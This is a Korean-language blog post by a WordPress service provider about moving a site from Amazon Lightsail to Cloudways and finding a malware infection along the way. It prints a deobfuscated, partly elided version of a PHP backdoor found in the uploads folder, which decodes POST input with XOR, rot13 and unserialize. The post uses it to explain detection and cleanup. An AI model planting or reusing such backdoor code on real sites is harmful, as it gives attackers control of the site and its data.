저는 워드프레스 이전 작업 요청을 많이 받는 편입니다. 최근에는 아마존 라이트세일에서 클라우드웨이즈로 워드프레스를 이전하는 작업을 맡았습니다. 워드프레스를 이전하는 작업은 비교적 쉬운 편이지만, 경우에 따라 해결해야 하는 문제가 있을 수 있습니다.
AWS에서 클라우드웨이즈로 워드프레스 이전 작업
도전
클라이언트께서는 아마존 라이트세일에서 운영 중인 사이트가 잦은 500 에러, 해킹으로 인한 사이트 다운 등 문제가 많아서 클라우드웨이즈로 이전하기를 원했습니다.
AWS에서는 서버를 직접 세팅하고 보안 조치를 해야 합니다. 클라우드웨이즈는 AWS에 비해서는 비용이 조금 비싼 편이지만 서버를 쉽게 관리할 수 있고 문제가 발생 시 라이브 채팅을 통해 고객지원을 받을 수 있다는 이점이 있습니다.
진행 과정
추가적인 백업
SFTP에 접속할 수 없어 클라께서 제공한 UpdraftPlus 백업본을 가지고 이전을 실행하기로 했습니다. 의뢰 당시 사이트에 접속할 수 없었지만, 이후 이전을 시작할 때에는 접속이 가능해져 All-in-One WP Migration이라는 워드프레스 마이그레이션 플러그인을 사용하여 추가로 백업을 받았습니다.
클라우드웨이즈 계정 활성화 문제
하지만 의뢰인이 클라우드웨이즈에 가입했지만 계정이 보류되어 작업을 한동안 진행하지 못했습니다. 계정이 보류되어 계정 확인(인증)이 필요한 경우 다음 글을 참고하여 계정을 활성화할 수 있습니다.
우리나라에서 스팸 가입자/불량 가입자가 늘어남에 따라 클라우드웨이즈에서는 일부 계정에 대하여 확인 요청을 할 수 있습니다.
이때 위의 글을 참고하여 요구하는 정보를 성실히 작성하여 보내면 보통 문제가 해결될 것입니다.
하지만 한 번에 인증이 되지 않을 경우에는 여러 번 메일을 보내도 잘 안 되는 것 같습니다.
의뢰인의 경우가 이 케이스에 해당되었는데요. 3주 이상 계정이 보류되어 작업을 진행하지 못했습니다. 그래서 제가 의뢰인으로부터 계정 활성화에 필요한 정보를 받아서, 클라우드웨이즈에 연락을 했습니다. 사이트 이전 작업을 해야 하니 계정 활성화를 요청하니 곧바로 계정을 활성화해 주었습니다.
(클라우드웨이즈 계정 활성화에 어려움을 겪는 경우 사이트 이전(유료) 의뢰를 해주시면 제가 클웨에 연락하여 이전 작업을 해야 하니 계정 활성화를 해달라고 요청해 드릴 수 있습니다. 사이트 규모가 크지 않는 경우 저렴하게 이전이 가능합니다.)
이전 진행
백업을 받은 자료를 가지고 이전을 진행했습니다.
일부 이미지 파일 이름에 한글이 포함되어 있었습니다. 백업본을 살펴보니 파일 이름에 포함된 한글의 자모가 분리되어 표시되는 현상이 나타났습니다.
가능하면 이미지 파일 이름에는 한글을 사용하지 않는 것이 바람직합니다.
이런 문제가 발생할 것에 대비하여 여러 가지 백업 방법으로 백업을 하면 이 문제가 발생하지 않는 백업본이 있을 수 있습니다.
이전 완료 후 도메인을 연결하고 SSL 인증서를 설치하여 이전을 마무리했습니다.
문제점
AWS에서 사이트가 잘 안 열리고 사이트가 매우 느렸습니다. 클라우드웨이즈로 이전한 후에는 사이트 속도가 매우 빨라졌습니다.
하지만 이전 후에 SFTP에 접속하여 사이트를 살펴보니 이상한 파일들이 발견되었습니다.
상기 그림은 [**uploads**] 폴더에 [**admin.php**]라는 이상한 파일이 있는 것을 보여줍니다.
일반적으로 uploads 폴더에는 php 파일이 있으면 안 됩니다. php 파일이 생성되어 있다면 멀웨어 감염을 의심해 볼 수 있습니다.
AWS에서 사이트 속도가 느린 이유가 악성코드에 감염되어 나타나는 현상 같았습니다.
admin.php 파일을 텍스트 에디터로 열어보았습니다. 아래 그림과 같이 알아보기 어려운 코드들이 가득했습니다.
악성코드는 사람들이 잘 알아보지 못하도록 "난독화"가 되어 있습니다. 코드를 그대로 복사하여 챗GPT에 코드를 알기 쉬운 형태로 바꾸어 달라고 요청해 보면 해당 코드가 어떤 기능을 하는 코드인지 대충 알 수 있습니다.
문제가 된 코드를 단순화하여 변환해달라고 요청하니 다음과 같은 코드로 바꾸어주었습니다.
<?php
$documentRoot = $_SERVER['DOCUMENT_ROOT'];
$httpHost = $_SERVER['HTTP_HOST'];
$http = 'http://';
$phpExtension = '.php';
$phpFunction = 'php';
$filePutContent = 'file_put_contents';
$rawUrlDecode = 'rawurldecode';
$unserialize = 'unserialize';
$isWritable = 'is_writable';
$phpVersion = 'phpversion';
$strRot13 = 'str_rot13';
$realize = 'realize';
$strSplit = 'str_split';
foreach ($_POST as $key => $value) {
$keyLength = strlen($key);
if ($keyLength == 16) {
$value = $strSplit($rawUrlDecode($strRot13($value)));
$key = array_slice($strSplit(str_repeat($key, (count($value)/16)+1)), 0, count($value));
$value = array_map(function ($itemValue, $itemKey, $keyArray) {
$xorKey = "8ac25fb7-7900-43cc-b8bd-4aa87540a1d3";
return $itemValue ^ $xorKey[$itemKey % strlen($xorKey)] ^ $keyArray[$itemKey];
}, array_values($value), array_keys($value), array_values($key));
$value = implode("", $value);
$value = @$unserialize($value);
if (@is_array($value)) {
$keys = array_keys($value);
$value = $value[$keys[0]];
if ($value === $keys[0]) {
echo @$realize(Array($phpFunction => @$phpVersion(), ));
exit();
} else {
// Additional code to manipulate file system and network communications
}
}
}
}
?>
상기 코드는 임의 코드 실행, 파일 시스템 조작, 네트워크 통신 등의 기능을 하며 전형적인 악성코드에 해당한다고 합니다.
또한, 테마 폴더에도 이상한 테마가 설치되어 있었습니다.
해당 사이트에는 뉴스페이퍼 테마가 설치되어 있었는데, 버전이 오래되어 오랫동안 업데이트가 되지 않았습니다.
뉴스페이퍼 테마는 작년 보안 취약점이 발견되면서 많은 사이트가 멀웨어에 감염되었습니다.
저는 최근 뉴스페이퍼 테마가 설치된 사이트에서 멀웨어에 감염된 사례를 자주 접하고 있습니다.
뉴스페이퍼 테마를 이용하는 경우 반드시 최신 버전으로 업데이트하시기 바랍니다. 그리고 FTP/SFTP에 접속하여 이상한 파일이 없는지도 체크해 보세요.
사이트가 느려지거나 혹은 사이트에 접속이 되지 않는다거나, 이상한 사이트로 리디렉션되는 경우 악성코드에 감염되었을 가능성이 높습니다.
멀웨어에 감염되면 복구가 쉽지 않을 수 있습니다. 백업본이 있다면 복원하는 것이 가장 손쉬운 방법입니다. 복원 후에 업데이트를 하는 등 보안 조치를 취해야 합니다.
워드프레스 문제나 멀웨어 감염 등으로 어려움을 겪는 경우 여기에서 서비스(유료)를 의뢰하실 수 있습니다.
참고
https://avada.tistory.com/3046
https://avada.tistory.com/2897